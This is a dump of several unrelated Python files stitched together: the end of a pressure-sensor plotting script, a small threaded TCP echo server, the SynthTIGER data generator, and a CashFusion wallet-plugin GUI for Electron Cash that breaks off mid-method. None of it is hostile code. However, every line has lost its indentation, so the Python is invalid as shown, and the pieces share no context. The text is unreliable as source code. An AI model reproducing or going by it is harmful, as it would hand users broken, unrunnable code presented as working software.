while self.t_list[-1] - self.t_list[0] > self.param['t_window']:
self.t_list.pop(0)
for value_list in self.data_list:
value_list.pop(0)
self.live_plot.update(self.t_list, self.data_list)
class LivePlot(object):
def __init__(self, param):
self.param = param
self.p_range = self.param['p_range']
self.line_list = []
self.setup_plots()
def setup_plots(self):
plt.ion()
self.fig = plt.figure(1,figsize=self.param['figsize'])
self.ax = plt.subplot(111)
plt.grid('on')
plt.xlabel('t (sec)')
plt.ylabel('P (Pa)')
label_list = []
for ind in self.param['plot_list']:
line, = plt.plot([0.0,self.param['t_window']], [0,0])
self.line_list.append(line)
self.ax.set_xlim(0.0,self.param['t_window'])
self.ax.set_ylim(self.p_range[0],self.p_range[1])
line.set_xdata([])
line.set_ydata([])
label_list.append('sens {}'.format(ind))
plt.figlegend(self.line_list,label_list,'upper right')
def update(self, t_list, data_list):
for i, ind in enumerate(self.param['plot_list']):
line = self.line_list[i]
values = data_list[ind]
line.set_xdata(t_list)
line.set_ydata(values)
self.ax.set_xlim(min(t_list),max(self.param['t_window'],max(t_list)))
self.fig.canvas.flush_events()
plt.pause(0.02)
# ---------------------------------------------------------------------------------------
if __name__ == '__main__':
param = {
'port' : '/dev/ttyACM0',
'baudrate' : 115200,
'timeout' : 0.1,
'figsize' : (20,5),
't_window' : 5.0,
'p_range' : (98300, 98400),
'plot_list' : [0,26],
'datafile' : 'data.txt',
}
streamer = PressureStreamer(param)
streamer.run()
|
tcp_server.py
|
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print "[*] Listening on %s:%d" % (bind_ip,bind_port)
# this is our client-handling thread, The handle_client function performs the recv() and then sends a simple message back to the client.
def handle_client(client_socket):
# print out what the client sends
request = client_socket.recv(1024)
print "[*] Received: %s" % request
# send back a packet
client_socket.send("ACK!")
client_socket.close()
while True:
client,addr = server.accept()
print "[*] Accepted connection from: %s:%d" % (addr[0],addr[1])
# spint up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
|
gen.py
|
"""
SynthTIGER
Copyright (c) 2021-present NAVER Corp.
MIT license
"""
import os
import random
import sys
import traceback
from multiprocessing import Process, Queue
import numpy as np
import yaml
def read_template(path, name, config=None):
path = os.path.abspath(path)
root = os.path.dirname(path)
module = os.path.splitext(os.path.basename(path))[0]
sys.path.append(root)
template = getattr(__import__(module), name)(config)
sys.path.remove(root)
del sys.modules[module]
return template
def read_config(path):
with open(path, "r", encoding="utf-8") as fp:
config = yaml.load(fp, Loader=yaml.SafeLoader)
return config
def generator(path, name, config=None, worker=0, verbose=False):
if worker > 0:
queue = Queue(maxsize=1024)
for _ in range(worker):
_run(_worker, (path, name, config, queue, verbose))
while True:
data = queue.get()
yield data
else:
template = read_template(path, name, config)
while True:
data = _generate(template, verbose)
yield data
def _run(func, args):
proc = Process(target=func, args=args)
proc.daemon = True
proc.start()
return proc
def _worker(path, name, config, queue, verbose):
random.seed()
np.random.seed()
template = read_template(path, name, config)
while True:
data = _generate(template, verbose)
queue.put(data)
def _generate(template, verbose):
while True:
try:
data = template.generate()
except:
if verbose:
print(f"{traceback.format_exc()}")
continue
return data
|
qt.py
|
#!/usr/bin/env python3
#
# Electron Cash - a lightweight Bitcoin Cash client
# CashFusion - an advanced coin anonymizer
#
# Copyright (C) 2020 Mark B. Lundeberg
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
import weakref
from functools import partial
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electroncash.i18n import _, ngettext, pgettext
from electroncash.plugins import hook, run_hook
from electroncash.util import (
do_in_main_thread, finalization_print_error, format_satoshis_plain, InvalidPassword, inv_dict, print_error,
PrintError, profiler)
from electroncash.wallet import Abstract_Wallet
from electroncash_gui.qt.amountedit import BTCAmountEdit
from electroncash_gui.qt.main_window import ElectrumWindow, StatusBarButton
from electroncash_gui.qt.popup_widget import ShowPopupLabel, KillPopupLabel
from electroncash_gui.qt.util import (
Buttons, CancelButton, CloseButton, ColorScheme, OkButton, WaitingDialog, WindowModalDialog)
from electroncash_gui.qt.utils import PortValidator, UserPortValidator
from .conf import Conf, Global
from .fusion import can_fuse_from, can_fuse_to
from .server import Params
from .plugin import FusionPlugin, TOR_PORTS, COIN_FRACTION_FUDGE_FACTOR, select_coins
from pathlib import Path
heredir = Path(__file__).parent
icon_fusion_logo = QIcon(str(heredir / 'Cash Fusion Logo - No Text.svg'))
icon_fusion_logo_gray = QIcon(str(heredir / 'Cash Fusion Logo - No Text Gray.svg'))
image_red_exclamation = QImage(str(heredir / 'red_exclamation.png'))
class Plugin(FusionPlugin, QObject):
server_status_changed_signal = pyqtSignal(bool, tuple)
fusions_win = None
weak_settings_tab = None
gui = None
initted = False
last_server_status = (True, ("Ok", ''))
_hide_history_txs = False
def __init__(self, *args, **kwargs):
QObject.__init__(self) # parentless top-level QObject. We need this type for the signal.
FusionPlugin.__init__(self, *args, **kwargs) # gives us self.config
self.widgets = weakref.WeakSet() # widgets we made, that need to be hidden & deleted when plugin is disabled
self._hide_history_txs = Global(self.config).hide_history_txs
def on_close(self):
super().on_close()
# Shut down plugin.
# This can be triggered from one wallet's window while
# other wallets' windows have plugin-related modals open.
for window in self.gui.windows:
# this could be slow since it touches windows one by one... could optimize this by dispatching simultaneously.
self.on_close_window(window)
# Clean up
for w in self.widgets:
try:
w.setParent(None)
w.close()
w.hide()
w.deleteLater()
except Exception:
# could be <RuntimeError: wrapped C/C++ object of type SettingsDialog has been deleted> but really we just want to suppress all exceptions
pass
# clean up member attributes to be tidy
self.fusions_win = None # should trigger a deletion of object if not already dead
self.weak_settings_tab = None
self.gui = None
self.initted = False
@hook
def init_qt(self, gui):
# This gets called when this plugin is initialized, but also when
# any other plugin is initialized after us.
if self.initted:
return
self.initted = self.active = True # self.active is declared in super
self.gui = gui
if self.gui.nd:
# since a network dialog already exists, let's create the settings
# tab now.
self.on_network_dialog(self.gui.nd)
# We also have to find which windows are already open, and make
# them work with fusion.
for window in self.gui.windows:
self.on_new_window(window)
@hook
def address_list_context_menu_setup(self, address_list, menu, addrs):
if not self.active:
return
wallet = address_list.wallet
window = address_list.parent
network = wallet.network
if not (can_fuse_from(wallet) and can_fuse_to(wallet) and network):
return
if not hasattr(wallet, '_fusions'):
# that's a bug... all wallets should have this
return
coins = wallet.get_utxos(addrs, exclude_frozen=True, mature=True, confirmed_only=True, exclude_slp=True)
def start_fusion():
def do_it(password):
try:
with wallet.lock:
if not hasattr(wallet, '_fusions'):
return
fusion = self.create_fusion(wallet, password, coins)
fusion.start()
except RuntimeError as e:
window.show_error(_('CashFusion failed: {error_message}').format(error_message=str(e)))
return
window.show_message(ngettext("One coin has been sent to CashFusion for fusing.",
"{count} coins have been sent to CashFusion for fusing.",
len(coins)).format(count=len(coins)))
has_pw, password = Plugin.get_cached_pw(wallet)
if has_pw and password is None:
d = PasswordDialog(wallet, _("Enter your password to fuse these coins"), do_it)
d.show()
self.widgets.add(d)
else:
do_it(password)
if coins:
menu.addAction(ngettext("Input one coin to CashFusion", "Input {count} coins to CashFusion", len(coins)).format(count = len(coins)),
start_fusion)
@hook
def on_new_window(self, window):
# Called on initial plugin load (if enabled) and every new window; only once per window.
wallet = window.wallet
can_fuse = can_fuse_from(wallet) and can_fuse_to(wallet)
if can_fuse:
sbbtn = FusionButton(self, wallet)
self.server_status_changed_signal.connect(sbbtn.update_server_error)
else:
# If we can not fuse we create a dummy fusion button that just displays a message
sbmsg = _('This wallet type ({wtype}) cannot be used with CashFusion.\n\nPlease use a standard deterministic spending wallet with CashFusion.').format(wtype=wallet.wallet_type)
sbbtn = DisabledFusionButton(wallet, sbmsg)
# bit of a dirty hack, to insert our status bar icon (always using index 4, should put us just after the password-changer icon)
sb = window.statusBar()
sb.insertPermanentWidget(4, sbbtn)
self.widgets.add(sbbtn)
window._cashfusion_button = weakref.ref(sbbtn)
if not can_fuse:
# don't do anything with non-fusable wallets
# (if inter-wallet fusing is added, this should change.)
return
want_autofuse = Conf(wallet).autofuse
self.add_wallet(wallet, window.gui_object.get_cached_password(wallet))
sbbtn.update_state()
# prompt for password if auto-fuse was enabled
if want_autofuse and not self.is_autofusing(wallet):
def callback(password):
self.enable_autofusing(wallet, password)
button = window._cashfusion_button()
if button: button.update_state()
d = PasswordDialog(wallet, _("Previously you had auto-fusion enabled on this wallet. If you would like to keep auto-fusing in the background, enter your password."),
callback_ok = callback)
d.show()
self.widgets.add(d)
@hook
def on_close_window(self, window):
# Invoked when closing wallet or entire application
# Also called by on_close, above.
wallet = window.wallet
fusions = self.remove_wallet(wallet)
if not fusions:
return
for f in fusions:
f.stop('Closing wallet')
# Soft-stop background fuse if running.
# We avoid doing a hard disconnect in the middle of a fusion round.
def task():
for f in fusions:
f.join()
d = WaitingDialog(window.top_level_window(), _('Shutting down active CashFusions (may take a minute to finish)'), task)
d.exec_()
@hook
def on_new_password(self, window, old, new):
wallet = window.wallet
if self.is_autofusing(wallet):
try:
self.enable_autofusing(wallet, new)
self.print_error(wallet, "updated autofusion password")
except InvalidPassword:
self.disable_autofusing(wallet)
self.print_error(wallet, "disabled autofusion due to incorrect password - BUG")
def show_util_window(self, ):
if self.fusions_win is None:
# keep a singleton around
self.fusions_win = FusionsWindow(self)
self.widgets.add(self.fusions_win)
self.fusions_win.show()
self.fusions_win.raise_()
def requires_settings(self):
# called from main_window.py internal_plugins_dialog
return True
def settings_widget(self, window):
# called from main_window.py internal_plugins_dialog
btn = QPushButton(_('Settings'))
btn.clicked.connect(self.show_settings_dialog)
return btn
def show_settings_dialog(self):
self.gui.show_network_dialog(None, jumpto='fusion')
@hook
def on_network_dialog(self, network_dialog):
if self.weak_settings_tab and self.weak_settings_tab():
return # already exists
settings_tab = SettingsWidget(self)
self.server_status_changed_signal.connect(settings_tab.update_server_error)
tabs = network_dialog.nlayout.tabs
tabs.addTab(settings_tab, icon_fusion_logo, _('CashFusion'))
self.widgets.add(settings_tab)
self.weak_settings_tab = weakref.ref(settings_tab)
@hook
def on_network_dialog_jumpto(self, nlayout, location):
settings_tab = self.weak_settings_tab and self.weak_settings_tab()
if settings_tab and location in ('fusion', 'cashfusion'):
nlayout.tabs.setCurrentWidget(settings_tab)
return True
def update_coins_ui(self, wallet):
''' Overrides super, the Fusion thread calls this in its thread context
to indicate it froze/unfroze some coins. We must update the coins tab,
but only in the main thread.'''
def update_coins_tab(wallet):
strong_window = wallet and wallet.weak_window and wallet.weak_window()
if strong_window:
strong_window.utxo_list.update() # this is rate_limited so it's ok to call it many times in rapid succession.
do_in_main_thread(update_coins_tab, wallet)
def notify_server_status(self, b, tup):
''' Reimplemented from super '''
super().notify_server_status(b, tup)
status_tup = (b, tup)
if self.last_server_status != status_tup:
self.last_server_status = status_tup
self.server_status_changed_signal.emit(b, tup)
def get_server_error(self) -> tuple:
''' Returns a 2-tuple of strings for the last server error, or None
if there is no extant server error. '''
if not self.last_server_status[0]:
return self.last_server_status[1]
@classmethod
def window_for_wallet(cls, wallet):
''' Convenience: Given a wallet instance, derefernces the weak_window
attribute of the wallet and returns a strong reference to the window.
May return None if the window is gone (deallocated). '''
assert isinstance(wallet, Abstract_Wallet)
return (wallet.weak_window and wallet.weak_window()) or None
@classmethod
def get_suitable_dialog_window_parent(cls, wallet_or_window):
''' Convenience: Given a wallet or a window instance, return a suitable
'top level window' parent to use for dialog boxes. '''
if isinstance(wallet_or_window, Abstract_Wallet):
wallet = wallet_or_window
window = cls.window_for_wallet(wallet)
return (window and window.top_level_window()) or None
elif isinstance(wallet_or_window, ElectrumWindow):
window = wallet_or_window
return window.top_level_window()
else:
raise TypeError(f"Expected a wallet or a window instance, instead got {type(wallet_or_window)}")
@classmethod
def get_cached_pw(cls, wallet):
''' Will return a tuple: (bool, password) for the given wallet. The
boolean is whether the wallet is password protected and the second
item is the cached password, if it's known, otherwise None if it is not
known. If the wallet has no password protection the tuple is always
(False, None). '''
if not wallet.has_password():
return False, None
window = cls.window_for_wallet(wallet)
if not window:
raise RuntimeError(f'Wallet {wallet.diagnostic_name()} lacks a valid ElectrumWindow instance!')
pw = window.gui_object.get_cached_password(wallet)
if pw is not None:
try:
wallet.check_password(pw)
except InvalidPassword:
pw = None
return True, pw
@classmethod
def cache_pw(cls, wallet, password):
window = cls.window_for_wallet(wallet)
if window:
window.gui_object.cache_password(wallet, password)
def enable_autofusing(self, wallet, password):
""" Overrides super, if super successfully turns on autofusing, kicks
off the timer to check that Tor is working. """
super().enable_autofusing(wallet, password)
if self.is_autofusing(wallet):
# ok, autofuse enable success -- kick of the timer task to check if
# Tor is good
do_in_main_thread(self._maybe_prompt_user_if_they_want_integrated_tor_if_no_tor_found, wallet)
_integrated_tor_timer = None
def _maybe_prompt_user_if_they_want_integrated_tor_if_no_tor_found(self, wallet):
if self._integrated_tor_timer:
# timer already active or already prompted user
return
weak_self = weakref.ref(self)
weak_window = wallet.weak_window
if not weak_window or not weak_window():
# Something's wrong -- no window for wallet
return;
def chk_tor_ok():
self = weak_self()
if not self:
return
self._integrated_tor_timer = None # kill QTimer reference
window = weak_window()
if window and self.active and self.gui and self.gui.windows and self.tor_port_good is None:
network = self.gui.daemon.network
if network and network.tor_controller.is_available() and not network.tor_controller.is_enabled():
icon_pm = icon_fusion_logo.pixmap(32)
answer = window.question(
_('CashFusion requires Tor to operate anonymously. Would'
' you like to enable the Tor client now?'),
icon = icon_pm,
title = _("Tor Required"),
parent = None,
app_modal = True,
rich_text = True,
defaultButton = QMessageBox.Yes
)
if answer:
def on_status(controller):
try: network.tor_controller.status_changed.remove(on_status) # remove the callback immediately
except ValueError: pass
if controller.status == controller.Status.STARTED:
buttons = [ _('Settings...'), _('Ok') ]
index = window.show_message(
_('The Tor client has been successfully started.'),
detail_text = (
_("The Tor client can be stopped at any time from the Network Settings -> Proxy Tab"
", however CashFusion does require Tor in order to operate correctly.")
),
icon = icon_pm,
rich_text = True,
buttons = buttons,
defaultButton = buttons[1],
escapeButton = buttons[1]
)
if index == 0:
# They want to go to "Settings..." so send
# them to the Tor settings (in Proxy tab)
self.gui.show_network_dialog(window, jumpto='tor')
else:
controller.set_enabled(False) # latch it back to False so we may prompt them again in the future
window.show_error(_('There was an error starting the Tor client'))
network.tor_controller.status_changed.append(on_status)
network.tor_controller.set_enabled(True)
self._integrated_tor_timer = t = QTimer()
# if in 5 seconds no tor port, ask user if they want to enable the Tor
t.timeout.connect(chk_tor_ok)
t.setSingleShot(True)
t.start(2500)
@hook
def history_list_filter(self, history_list, h_item, label):
if self._hide_history_txs:
return bool(label.startswith("CashFusion ")) # this string is not translated for performance reasons
return None
@hook
def history_list_context_menu_setup(self, history_list, menu, item, tx_hash):
# NB: We unconditionally create this menu if the plugin is loaded because
# it's possible for any wallet, even a watching-only wallet to have
# fusion tx's with the correct labels (if the user uses labelsync or
# has imported labels).
menu.addSeparator()
def action_callback():
self._hide_history_txs = not self._hide_history_txs
Global(self.config).hide_history_txs = self._hide_history_txs
action.setChecked(self._hide_history_txs)
if self._hide_history_txs:
tip = _("Fusion transactions are now hidden")
else:
tip = _("Fusion transactions are now shown")
QToolTip.showText(QCursor.pos(), tip, history_list)
history_list.update() # unconditionally update this history list as it may be embedded in the address_detail window and not a global history list..
for w in self.gui.windows:
# Need to update all the other open windows.
# Note: We still miss any other open windows' address-detail
# history lists with this.. but that's ok as most of the
# time it won't be noticed by people and actually
# finding all those windows would just make this code
# less maintainable.
if history_list is not w.history_list: # check if not already updated above
w.history_list.update()
action = menu.addAction(_("Hide CashFusions"), action_callback)
action.setCheckable(True)
action.setChecked(self._hide_history_txs)
class PasswordDialog(WindowModalDialog):
""" Slightly fancier password dialog -- can be used non-modal (asynchronous) and has internal password checking.
To run non-modally, use .show with the callbacks; to run modally, use .run. """
def __init__(self, wallet, message, callback_ok = None, callback_cancel = None):
parent = Plugin.get_suitable_dialog_window_parent(wallet)
super().__init__(parent=parent, title=_("Enter Password"))
self.setWindowIcon(icon_fusion_logo)
self.wallet = wallet
self.callback_ok = callback_ok
self.callback_cancel = callback_cancel
self.password = None
vbox = QVBoxLayout(self)
self.msglabel = QLabel(message)
self.msglabel.setWordWrap(True)
self.msglabel.setMinimumWidth(250)
self.msglabel.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Expanding)
hbox = QHBoxLayout()
iconlabel = QLabel(); iconlabel.setPixmap(icon_fusion_logo.pixmap(32))
hbox.addWidget(iconlabel)
hbox.addWidget(self.msglabel, 1, Qt.AlignLeft|Qt.AlignVCenter)
cmargins = hbox.contentsMargins(); cmargins.setBottom(10); hbox.setContentsMargins(cmargins) # pad the bottom a bit
vbox.addLayout(hbox, 1)
self.pwle = QLineEdit()
self.pwle.setEchoMode(2)
grid_for_hook_api = QGridLayout()
grid_for_hook_api.setContentsMargins(0,0,0,0)
grid_for_hook_api.addWidget(self.pwle, 0, 0)
run_hook('password_dialog', self.pwle, grid_for_hook_api, 0) # this is for the virtual keyboard plugin
vbox.addLayout(grid_for_hook_api)
self.badpass_msg = "<i>" + _("Incorrect password entered. Please try again.") + "</i>"
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(CancelButton(self))
okbutton = OkButton(self)
okbutton.clicked.disconnect()
okbutton.clicked.connect(self.pw_entered)
buttons.addWidget(okbutton)
vbox.addLayout(buttons)
def _on_pw_ok(self, password):
self.password = password
Plugin.cache_pw(self.wallet, password) # to remember it for a time so as to not keep bugging the user
self.accept()
if self.callback_ok:
self.callback_ok(password)
def _chk_pass(self, password):
pw_ok = not self.wallet.has_password()
if not pw_ok:
try:
self.wallet.check_password(password)
pw_ok = True
except InvalidPassword:
pass
return pw_ok
def pw_entered(self, ):
password = self.pwle.text()
if self._chk_pass(password):
self._on_pw_ok(password)
else:
self.msglabel.setText(self.badpass_msg)
self.pwle.clear()
self.pwle.setFocus()
def closeEvent(self, event):
''' This happens if .run() is called, then dialog is closed. '''
super().closeEvent(event)
if event.isAccepted():
self._close_hide_common()
def hideEvent(self, event):
''' This happens if .show() is called, then dialog is closed. '''
super().hideEvent(event)
if event.isAccepted():
self._close_hide_common()
def _close_hide_common(self):
if not self.result() and self.callback_cancel:
self.callback_cancel(self)
self.setParent(None)
self.deleteLater()
def run(self):
self.exec_()
return self.password
class DisabledFusionButton(StatusBarButton):
def __init__(self, wallet, message):
super().__init__(icon_fusion_logo_gray, 'Fusion', self.show_message)
self.wallet = wallet
self.message = message
self.setToolTip(_("CashFusion (disabled)"))
def show_message(self):
QMessageBox.information(Plugin.get_suitable_dialog_window_parent(self.wallet),
_("CashFusion is disabled"), self.message)
class FusionButton(StatusBarButton):
def __init__(self, plugin, wallet):
super().__init__(QIcon(), 'Fusion', self.toggle_autofuse)
self.plugin = plugin
self.wallet = wallet
self.server_error : tuple = None
self.icon_autofusing_on = icon_fusion_logo
self.icon_autofusing_off = icon_fusion_logo_gray
self.icon_fusing_problem = self.style().standardIcon(QStyle.SP_MessageBoxWarning)
# title = QWidgetAction(self)
# title.setDefaultWidget(QLabel("<i>" + _("CashFusion") + "</i>"))
self.action_toggle = QAction(_("Auto-Fuse in Background"))
self.action_toggle.setCheckable(True)
self.action_toggle.triggered.connect(self.toggle_autofuse)
action_separator1 = QAction(self); action_separator1.setSeparator(True)
action_wsettings = QAction(_("Wallet Fusion Settings..."), self)
action_wsettings.triggered.connect(self.show_wallet_settings)
action_settings = QAction(_("Server Settings..."), self)
action_settings.triggered.connect(self.plugin.show_settings_dialog)
action_separator2 = QAction(self); action_separator2.setSeparator(True)
action_util = QAction(_("Fusions..."), self)
action_util.triggered.connect(self.plugin.show_util_window)
self.addActions([self.action_toggle, action_separator1,
action_wsettings, action_settings,
action_separator2, action_util])
self.setContextMenuPolicy(Qt.ActionsContextMenu)
self.update_state()
def update_state(self):
autofuse = self.plugin.is_autofusing(self.wallet)
self.action_toggle.setChecked(autofuse)
if autofuse:
self.setIcon(self.icon_autofusing_on)
self.setToolTip(_('CashFusion is fusing in the background for this wallet'))
self.setStatusTip(_('CashFusion Auto-fusion - Enabled'))
else:
self.setIcon(self.icon_autofusing_off)
self.setToolTip(_('Auto-fusion is paused for this wallet (click to enable)'))
self.setStatusTip(_('CashFusion Auto-fusion - Disabled (click to enable)'))
if self.server_error:
self.setToolTip(_('CashFusion') + ": " + ', '.join(self.server_error))
self.setStatusTip(_('CashFusion') + ": " + ', '.join(self.server_error))
def paintEvent(self, event):
super().paintEvent(event)
if event.isAccepted() and self.server_error:
# draw error overlay if we are in an error state
p = QPainter(self)
try:
p.setClipRegion(event.region())
r = self.rect()
r -= QMargins(4,6,4,6)
r.moveCenter(r.center() + QPoint(4,4))
p.drawImage(r, image_red_exclamation)
finally:
# paranoia. The above never raises but.. if it does.. PyQt will
# crash hard if we don't end the QPainter properly before
# returning.
p.end()
del p
def toggle_autofuse(self):
plugin = self.plugin
autofuse = plugin.is_autofusing(self.wallet)
if not autofuse:
has_pw, password = Plugin.get_cached_pw(self.wallet)
if has_pw and password is None:
# Fixme: See if we can not use a blocking password dialog here.
pd = PasswordDialog(self.wallet, _("To perform auto-fusion in the background, please enter your password."))
self.plugin.widgets.add(pd) # just in case this plugin is unloaded while this dialog is up
password = pd.run()
del pd
if password is None or not plugin.active: # must check plugin.active because user can theoretically kill plugin from another window while the above password dialog is up
return
try:
plugin.enable_autofusing(self.wallet, password)
except InvalidPassword:
''' Somehow the password changed from underneath us. Silenty ignore. '''
else:
running = plugin.disable_autofusing(self.wallet)
if running:
res = QMessageBox.question(Plugin.get_suitable_dialog_window_parent(self.wallet),
_("Disabling automatic Cash Fusions"),
_("New automatic fusions will not be started, but you have {num} currently in progress."
" Would you like to signal them to stop?").format(num=len(running)) )
if res == QMessageBox.Yes:
for f in running:
f.stop('Stop requested by user')
self.update_state()
def show_wallet_settings(self):
win = getattr(self.wallet, '_cashfusion_settings_window', None)
if not win:
win = WalletSettingsDialog(Plugin.get_suitable_dialog_window_parent(self.wallet),
self.plugin, self.wallet)
self.plugin.widgets.add(win) # ensures if plugin is unloaded while dialog is up, that the dialog will be killed.
win.show()
win.raise_()
def update_server_error(self):
tup = self.plugin.get_server_error()
changed = tup != self.server_error
if not changed:
return
self.server_error = tup
name = "CashFusionError;" + str(id(self)) # make sure name is unique per FusionButton widget
if self.server_error:
weak_plugin = weakref.ref(self.plugin)
def onClick():
KillPopupLabel(name)
plugin = weak_plugin()
if plugin:
plugin.show_settings_dialog()
ShowPopupLabel(name = name,
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Server Error"),_("Click this popup to resolve")),
target=self,
timeout=20000, onClick=onClick, onRightClick=onClick,
dark_mode = ColorScheme.dark_scheme)
else:
KillPopupLabel(name)
self.update() # causes a repaint
window = self.wallet.weak_window and self.wallet.weak_window()
if window:
window.print_error("CashFusion server_error is now {}".format(self.server_error))
oldTip = self.statusTip()
self.update_state()
newTip = self.statusTip()
if newTip != oldTip:
window.statusBar().showMessage(newTip, 7500)
class SettingsWidget(QWidget):
torscanthread = None
torscanthread_update = pyqtSignal(object)
def __init__(self, plugin, parent=None):
super().__init__(parent)
self.plugin = plugin
self.torscanthread_ping = threading.Event()
self.torscanthread_update.connect(self.torport_update)
main_layout = QVBoxLayout(self)
box = QGroupBox(_("Network"))
main_layout.addWidget(box, 0, Qt.AlignTop | Qt.AlignHCenter)
slayout = QVBoxLayout(box)
grid = QGridLayout() ; slayout.addLayout(grid)
grid.addWidget(QLabel(_("Server")), 0, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 0, 1)
self.combo_server_host = QComboBox()
self.combo_server_host.setEditable(True)
self.combo_server_host.setInsertPolicy(QComboBox.NoInsert)
self.combo_server_host.setCompleter(None)
self.combo_server_host.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
self.combo_server_host.activated.connect(self.combo_server_activated)
self.combo_server_host.lineEdit().textEdited.connect(self.user_changed_server)
self.combo_server_host.addItems([f'{s[0]} ({s[1]}{" - ssl" if s[2] else ""})' for s in Global.Defaults.ServerList])
hbox.addWidget(self.combo_server_host)
hbox.addWidget(QLabel(_("P:")))
self.le_server_port = QLineEdit()
self.le_server_port.setMaximumWidth(50)
self.le_server_port.setValidator(PortValidator(self.le_server_port))
self.le_server_port.textEdited.connect(self.user_changed_server)
hbox.addWidget(self.le_server_port)
self.cb_server_ssl = QCheckBox(_('SSL'))
self.cb_server_ssl.clicked.connect(self.user_changed_server)
hbox.addWidget(self.cb_server_ssl)
self.server_error_label = QLabel()
self.server_error_label.setAlignment(Qt.AlignTop|Qt.AlignJustify)
grid.addWidget(self.server_error_label, 1, 0, 1, -1)
grid.addWidget(QLabel(_("Tor")), 2, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 2, 1)
self.le_tor_host = QLineEdit('localhost')
self.le_tor_host.textEdited.connect(self.user_edit_torhost)
hbox.addWidget(self.le_tor_host)
hbox.addWidget(QLabel(_("P:")))
self.le_tor_port = QLineEdit()
self.le_tor_port.setMaximumWidth(50)
self.le_tor_port.setValidator(UserPortValidator(self.le_tor_port))
self.le_tor_port.textEdited.connect(self.user_edit_torport)
hbox.addWidget(self.le_tor_port)
self.l_tor_status = QLabel()
hbox.addWidget(self.l_tor_status)
self.b_tor_refresh = QPushButton()
self.b_tor_refresh.clicked.connect(self.torscanthread_ping.set)
self.b_tor_refresh.setIcon(self.style().standardIcon(QStyle.SP_BrowserReload))
self.b_tor_refresh.setDefault(False); self.b_tor_refresh.setAutoDefault(False)
hbox.addWidget(self.b_tor_refresh)
self.cb_tor_auto = QCheckBox(_('Autodetect'))
self.cb_tor_auto.clicked.connect(self.cb_tor_auto_clicked)
hbox.addWidget(self.cb_tor_auto)
btn = QPushButton(_("Fusions...")); btn.setDefault(False); btn.setAutoDefault(False)
btn.clicked.connect(self.plugin.show_util_window)
buts = Buttons(btn)
buts.setAlignment(Qt.AlignRight | Qt.AlignTop)
main_layout.addLayout(buts)
main_layout.addStretch(1)
self.stretch_item_index = main_layout.count()-1
self.server_widget = ServerWidget(self.plugin)
self.server_widget.layout().setContentsMargins(0,0,0,0)
main_layout.addWidget(self.server_widget)
self.timer_server_widget_visibility = QTimer(self.server_widget)
self.timer_server_widget_visibility.setSingleShot(False)
self.timer_server_widget_visibility.timeout.connect(self.update_server_widget_visibility)
self.server_widget_index = main_layout.count()-1
self.pm_good_proxy = QIcon(":icons/status_connected_proxy.svg").pixmap(24)
self.pm_bad_proxy = QIcon(":icons/status_disconnected.svg").pixmap(24)
def update_server(self):
# called initially / when config changes
host, port, ssl = self.plugin.get_server()
try: # see if it's in default list, if so we can set it ...
index = Global.Defaults.ServerList.index((host,port,ssl))
except ValueError: # not in list
index = -1
self.combo_server_host.setCurrentIndex(index)
self.combo_server_host.setEditText(host)
self.le_server_port.setText(str(port))
self.cb_server_ssl.setChecked(ssl)
def update_server_error(self):
errtup = self.plugin.get_server_error()
self.server_error_label.setHidden(errtup is None)
if errtup:
color = ColorScheme.RED.get_html()
self.server_error_label.setText(f'<b>{errtup[0]}:</b> <font color="{color}"><i>{errtup[1]}</i></font>')
def combo_server_activated(self, index):
# only triggered when user selects a combo item
self.plugin.set_server(*Global.Defaults.ServerList[index])
self.update_server()
def user_changed_server(self, *args):
# user edited the host / port / ssl
host = self.combo_server_host.currentText()
try:
port = int(self.le_server_port.text())
except ValueError:
port = 0
ssl = self.cb_server_ssl.isChecked()
self.plugin.set_server(host, port, ssl)
def update_tor(self,):
# called on init an switch of auto
autoport = self.plugin.has_auto_torport()
host = self.plugin.get_torhost()
port = self.plugin.get_torport()
self.l_tor_status.clear()
self.torport_update(port)
self.cb_tor_auto.setChecked(autoport)
self.le_tor_host.setEnabled(not autoport)
self.le_tor_host.setText(str(host))
self.le_tor_port.setEnabled(not autoport)
if not autoport:
self.le_tor_port.setText(str(port))
def torport_update(self, goodport):
# signalled from the tor checker thread
autoport = self.plugin.has_auto_torport()
port = self.plugin.get_torport()
if autoport:
sport = '?' if port is None else str(port)
self.le_tor_port.setText(sport)
if goodport is None:
self.l_tor_status.setPixmap(self.pm_bad_proxy)
if autoport:
self.l_tor_status.setToolTip(_('Cannot find a Tor proxy on ports %(ports)s.')%dict(ports=TOR_PORTS))
else:
self.l_tor_status.setToolTip(_('Cannot find a Tor proxy on port %(port)d.')%dict(port=port))
else:
self.l_tor_status.setToolTip(_('Found a valid Tor proxy on this port.'))
self.l_tor_status.setPixmap(self.pm_good_proxy)
def user_edit_torhost(self, host):
self.plugin.set_torhost(host)
self.torscanthread_ping.set()
def user_edit_torport(self, sport):
try:
port = int(sport)
except ValueError:
return
self.plugin.set_torport(port)
self.torscanthread_ping.set()
def cb_tor_auto_clicked(self, state):
